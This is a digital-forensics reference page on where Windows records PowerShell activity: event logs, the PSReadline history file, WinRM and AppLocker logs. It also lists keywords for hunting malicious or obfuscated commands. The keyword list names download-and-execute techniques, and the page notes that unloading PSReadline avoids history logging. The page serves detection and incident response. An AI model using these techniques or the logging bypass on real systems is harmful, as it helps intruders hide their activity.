PowerShell activity

Windows DFIR notes are no longer maintained on InfoSec-Notes. Updated versions can be found on: artefacts.help.

Overview

Windows PowerShell version 2.0, and prior versions, provide few useful audit settings, thereby limiting the availability of evidence (such as a command history).

Upon executing any PowerShell command or script, either locally or using PS remoting, Windows may write events to the following hives:

  • Windows PowerShell.evtx

  • Microsoft-Windows-PowerShell\Operational.evtx

  • Microsoft-Windows-PowerShell\Analytic.etl (non default)

Starting with PowerShell v5 on Windows 10, the commands entered in a PowerShell console will be logged by the PSReadline module to an user-scoped ConsoleHost_history.txt file. Console-less PowerShell sessions, such as the content of PowerShell script or commands execution through the PowerShell ISE, will not be logged in this file. By default, the ConsoleHost_history.txt file will be located under: $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt. Bypassing PSReadline logging is however easy, as it simply requires to unload the PSReadline module (for instance with the Remove-Module PSReadline in an existing PowerShell session).

As PowerShell implements its remoting functionality through the Windows Remote Management (WinRM) service, remote PowerShell activity may induce events in the following hives:

  • Microsoft-Windows-WinRM\Operational.evtx

  • Microsoft-Windows-WinRM\Analytic.etl (non default)

The events linked to remote PowerShell activity, conducted through the WinRM service, are detailed in the Lateral movements section.

Additionally, if enabled, AppLocker will record PowerShell activity in the Microsoft-Windows-AppLocker\MSI and Script hive.

Note that PowerShell 2.0, and prior versions, provide limited logging capacities and thereby limit the availability of evidence, such as the interactive command history executed through PowerShell console.

The events providing command line / command history information should be searched for the following keywords (case insensitive search):

  • -Enc / -e

  • -nop / bypass

  • IEX / Invoke-Expression

  • ICM / Invoke-command

  • Net.WebClient / io.

  • DownloadString / DownloadFile

  • & / |

  • // / http / ftp / cifs / smb / etc.

  • join / nioj / replace / ecalper / -f / CHAR / RAHC / STRING / GNIRTS / marshal / convert / env / { / } (obfuscation detection)

While the occurrence of these keywords may entail malicious activities, their absence is not a formal proof of lack of malicious PowerShell activity as PowerShell code can be deeply obfuscated.

PowerShell deobfuscation

The PSDecode PowerShell script can be used to deobfuscate malicious PowerShell scripts that have several layers of encodings.

https://github.com/R3MRUM/PSDecode

Import-Module PSDecode.psm1

PSDecode <ENCODED_POWERSHELL_FILE>

PowerShell Windows events


References

https://www.blackhat.com/docs/us-14/materials/us-14-Kazanciyan-Investigating-Powershell-Attacks.pdf

https://www.jpcert.or.jp/english/pub/sr/20170612ac-ir_research_en.pdf

http://jpcertcc.github.io/ToolAnalysisResultSheet/details/PowerSploit_Invoke-Mimikatz.htm

https://www.eventsentry.com/blog/2018/01/powershell-p0wrh11-securing-powershell.html

https://www.powershellmagazine.com/2014/07/16/investigating-powershell-attacks/

https://nsfocusglobal.com/Attack-and-Defense-Around-PowerShell-Event-Logging

https://static1.squarespace.com/static/552092d5e4b0661088167e5c/t/59c1814829f18782e24f1fe2/1505853768977/ Windows+PowerShell+Logging+Cheat+Sheet+ver+Sept+2017+v2.1.pdf

https://www.eventtracker.com/EventTracker/media/EventTracker/Files/support-docs/Integration-Guide-Windows-PowerShell.pdf

https://www.blackhat.com/docs/us-14/materials/us-14-Kazanciyan-Investigating-Powershell-Attacks-WP.pdf

https://jpcertcc.github.io/ToolAnalysisResultSheet/details/WinRM.htm

Last updated